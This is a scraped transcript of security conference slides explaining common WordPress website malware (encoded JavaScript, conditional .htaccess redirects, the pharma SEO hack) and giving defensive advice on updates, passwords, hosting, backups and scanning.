why my website sells viagra
Post on 29-Jan-2015
122 Views
Preview:
DESCRIPTION
TRANSCRIPT
DRE ARMEDA,CISSP
@DREMEDA
2
CO-FOUNDER AT SUCURI SECURITYORGANIZER, WORDCAMP SAN DIEGO12 YEAR NAVY VETERAN1ST WORDPRESS THEME IN 2005LOVES TACOSDIEHARD CHARGERS FANRIDES A HARLEY
SUCURI.NETDRE.IM
3
THE WEB IS GROWING
4
Over 2 Billion internet users today. 480% growth in the last 11 years. (Internet World Stats)
300 million websites were added to the internet in 2011 (Pingdom)
100,000+ domains gained weekly (Global Domain Registry)
INNOVATION & CREATIVITY
5
6
7
8
9
ITS NOT ALL PEACHY
10
11
WHAT IS MALWARE?
12
SEO spam, JavaScript & iFrame attacks, and malicious redirects are a couple web-based malware examples.
Malware, short for malicious software, is a software designed to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.
ATTACKERS LOVE YOU
14
Monitor your web browsing and internet usageForced advertisingRedirect affiliate marketing revenue
HOW BAD IS IT?
15
Over 2 million new malware strings monthly (McAfee)
Cost to US consumers alone = over $2.3 billion in 2010. (Consumer Reports)
Google Safe Browsing issues over 3 million malware warnings a day. (Google)
16
ENCODED JAVASCRIPT17
Impact: Website pages may be used to serve malicious downloads to visitors. Downloads may be used to infect desktop computers, and/or exploit FTP info.
Typical Entry Point: Outdated, known vulnerable software; exploited desktop computers; exploited FTP credentials.
JavaScript that is obfuscated(hidden) so that you can’t tell what it is. It is injected into files/pages on the site and used to serve malware.
ENCODED JAVASCRIPT18
/wp-admin/js/cat.js – CLEAN
ENCODED JAVASCRIPT19
/wp-admin/js/cat.js – INFECTED
ENCODED JAVASCRIPT20
/wp-admin/js/cat.js – INFECTION DECODED – Somewhat
ENCODED JAVASCRIPT
1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes). Attack stems from exploited desktop which steals FTP information.
2. Backdoor file inserted into the environment. This gives the attacker remote access into your world
3. Payload inserted into various Javascript files and/or encoded and hidden in theme, plugin files.
4. You’ve just enabled your visitors to load fake anti-virus and other cool downloads from your site
How it works:
ENCODED JAVASCRIPT
Encoded JavaScript Resources:
http://www.schillmania.com/content/entries/2009/javascript-malware-obfuscation-
analysishttp://www.slideshare.net/yusufmotiwala/reverse-engineering-malicious-
javascripthttp://www.infosecisland.com/videos-view/19101-Malware-Analysis-How-to-Decode-JavaScript-
Obfuscation.html
QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
CONDITIONAL REDIRECTS23
Impact: When traffic is coming from a specific referrer (i.e. Google, Bing), the site is redirected to a malicious website.Typical Entry Point: Outdated, known vulnerable software.
An attack the causes a website to redirect to a malicious website based on referrer, web browser, operating system.
CONDITIONAL REDIRECTS24
Infected .htaccess file:
CONDITIONAL REDIRECTS25
Result of conditional redirect:
CONDITIONAL REDIRECTS
1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes).
2. Backdoor file inserted into the environment. This gives the attacker remote access into your world
3. .htaccess file entries are created to load redirected. Encoded redirect code can also be added to index files.
4. You’re now redirecting to some cool malware awesomeness.
How it works:
CONDITIONAL REDIRECTS
Conditional Redirects Resources:
http://blog.sucuri.net/2011/11/the-new-and-old-htaccess-attacks-now-using-in-
domains.htmlhttp
://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
http://sucuri.net/malware-update-timthumb-php-and-htaccess-redirection.html
PHARMA HACK28
Impact: Website page and post titles, descriptions and links are changed to display pharmaceutical ads and links back to malicious websites on search engine result pages.
Typical Entry Point: Outdated, known vulnerable software.
Pharma Hack is a type of SEO poisoning. Attackers manipulate their search engine results to make their links appear higher than legitimate results.
PHARMA HACK29
Results of scanning rendered source.:
PHARMA HACKGoogle Search Engine Results:
PHARMA HACK
1. Attacker scans for known vulnerable software (Old WordPress installations, plugins, themes)
2. Backdoor file inserted into the environment. This gives the attacker remote access into your world
3. Control file is inserted into core application or plugin files. This file acts as a connection from the backdoor to the database.
4. Payload is dropped into the database and Viva Viagra!
How it works:
QUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
PHARMA HACK
Pharma Hack Resources:
http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-
wordpress.htmlhttp://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-
hack.htmlhttp://www.pearsonified.com/2010/04/wordpress-
pharma-hack.phphttp://wpdude.com/refreshing-google-index-after-
pharma-hackQUICK TIP: Check Google to see if you’re infected - site:{yourdomain.com} viagra
33
WHAT IS SECURITY?
PROTECTING THINGS OF VALUE FROM HARM’S WAY.
HOW & WHY35
AM I SECURE
The percentage of risk can never be 0!
The name of the game is minimizing risk.
LOCAL MACHINE
Ensure your local machine stays updated
Use an Anti-Virus solution & enable auto-updatesMac – Sophos Anti-Virus for Mac Home EditionWindows - AVG Anti-Virus Free
Don’t store server credentials on your local machine
CONNECT TO YOUR SITE
Consider using sFTP or SSH instead of FTP.
If you’re stuck with FTP:
Deny anonymous loginLimit connections
Practice least privilege
Don’t store server credentials on your local machine
PASSWORDS
Change them oftenDon’t write them down, or share them
Passwords are like toothbrushes, you should keep them to yourself. And discard them, and get a new one, if they have been used by others.
Don’t use the same password across all your accounts
Use a password manager
KeePass Password SafeLastPass1Password
WHO HOSTS YOU?
CHEAP DOES NOT ALWAYS MEAN BEST, OR SAFEST!
DO YOUR RESEACH!
What software are they running? How often do they update?
How are server and support credentials stored & who has access? Are they 1 in the same?
What is their malware remediation process?How many sites have been infected?
http://www.google.com/safebrowsing/diagnostic?site=google.com
GARAGE CLEANING
IF YOU’RE NOT USING IT, REMOVE IT!
UPDATE UPDATE UPDATE UPDATE UPDATEOnly load what’s needed to get your job done.Check your file and directory permissions.Remove user accounts! – Practice least privilege.Have you changed your password lately?UPDATE UPDATE UPDATE UPDATE UPDATE
43
BACKUP YOUR WEBSITE
NO BACKUPS = BOOOOO!
BackupBuddy - http://pluginbuddy.com/backupbuddy/
VaultPress – http://vaultpress.com
MALWARE SCAN
IS YOUR SITE INFECTED?
Unmask Parasites – http://unmaskparasites.comSucuri SiteCheck – http://sitecheck.sucuri.net
MALWARE CLEAN UP
IS YOUR SITE INFECTED?
VaultPress – http://vaultpress.comSucuri Security – http://sucuri.net
WORDPRESS PLUGINS
WordPress Exploit ScannerBulletProof SecurityLogin LockdownSucuri SiteCheck Malware Scanner
top related